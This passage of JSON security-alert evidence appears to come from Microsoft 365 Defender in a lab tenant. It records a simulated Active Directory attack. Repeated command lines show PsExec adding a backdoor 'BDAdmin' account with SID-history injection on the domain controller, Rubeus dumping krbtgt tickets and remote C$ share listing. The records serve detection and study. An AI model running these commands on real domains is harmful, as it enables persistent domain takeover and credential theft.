"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:13:50.74Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-dc -accepteula cmd /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"",
"processCreationTime": "2022-11-21T02:11:50.6820828Z",
"processId": 6964,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:15:34.2233333Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1",
"processCreationTime": "2022-11-21T02:13:46.8940628Z",
"processId": 10192,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:15:34.2233333Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:13:46.8940628Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 10192,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"dir \\\\msdxv2-dc\\\\c$\"",
"processCreationTime": "2022-11-21T02:13:47.6030154Z",
"processId": 7364,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:15:34.39Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:13:46.8940628Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 10192,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"",
"processCreationTime": "2022-11-21T02:14:09.0953147Z",
"processId": 10104,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:51.98Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1",
"processCreationTime": "2022-11-21T02:15:44.2072512Z",
"processId": 3224,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:51.98Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:15:44.2072512Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 3224,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"",
"processCreationTime": "2022-11-21T02:16:06.0219779Z",
"processId": 7096,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:52.1733333Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:15:44.2072512Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 3224,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"dir \\\\msdxv2-dc\\\\c$\"",
"processCreationTime": "2022-11-21T02:15:44.764333Z",
"processId": 6344,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:54.46Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-dc -accepteula cmd /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"",
"processCreationTime": "2022-11-21T02:15:09.6937635Z",
"processId": 8456,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:23:47.1566667Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1",
"processCreationTime": "2022-11-21T02:22:01.0244855Z",
"processId": 2044,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:23:47.1566667Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:22:01.0244855Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 2044,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"dir \\\\msdxv2-dc\\c$ && C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"",
"processCreationTime": "2022-11-21T02:22:01.7837724Z",
"processId": 9512,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:23:48.2366667Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-dc -accepteula cmd /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"",
"processCreationTime": "2022-11-21T02:22:29.0007693Z",
"processId": 2844,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:25:47.51Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1",
"processCreationTime": "2022-11-21T02:23:51.2792242Z",
"processId": 9032,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:25:47.51Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:23:51.2792242Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 9032,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"dir \\\\msdxv2-dc\\c$ && C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"",
"processCreationTime": "2022-11-21T02:23:52.1337004Z",
"processId": 7672,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:25:47.78Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1",
"processCreationTime": "2022-11-21T02:24:23.71515Z",
"processId": 5992,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:25:47.78Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:24:23.71515Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 5992,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"dir \\\\msdxv2-dc\\c$ && C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"",
"processCreationTime": "2022-11-21T02:24:24.470083Z",
"processId": 3256,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:28:45.23Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-dc -accepteula cmd /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"",
"processCreationTime": "2022-11-21T02:25:06.765208Z",
"processId": 8552,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:31:02.5966667Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"dir \\\\msdxv2-dc\\c$ && C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"",
"processCreationTime": "2022-11-21T02:28:08.6699828Z",
"processId": 10952,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:32:44.25Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-dc -accepteula cmd /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"",
"processCreationTime": "2022-11-21T02:31:31.4528327Z",
"processId": 11916,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:32:45.51Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1",
"processCreationTime": "2022-11-21T02:30:58.5200922Z",
"processId": 3824,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:32:45.51Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:30:58.5200922Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 3824,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"dir \\\\msdxv2-dc\\\\c$\"",
"processCreationTime": "2022-11-21T02:30:59.2224922Z",
"processId": 3136,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:32:45.7833333Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:30:58.5200922Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 3824,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"",
"processCreationTime": "2022-11-21T02:31:20.715449Z",
"processId": 7252,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:34:57.14Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1",
"processCreationTime": "2022-11-21T02:32:59.3843671Z",
"processId": 8476,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
